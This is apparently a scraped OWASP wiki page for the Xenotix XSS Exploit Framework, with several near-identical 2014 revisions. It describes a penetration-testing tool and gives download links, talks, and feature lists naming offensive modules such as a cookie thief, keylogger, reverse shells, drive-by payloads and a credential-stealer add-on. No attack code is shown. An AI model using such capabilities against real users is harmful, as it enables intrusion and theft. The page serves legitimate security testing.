This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-10-12T14:08:42Z

Ajin Abraham: md5 fix

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshb3lnYk00aHRrbjg/view?usp=sharing
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-10-04T11:09:19Z

Ajin Abraham: added a download mirror

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshb3lnYk00aHRrbjg/view?usp=sharing
MD5: 69b96d2a66f7dffeaa8a7c7926278042
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-09-14T15:25:18Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
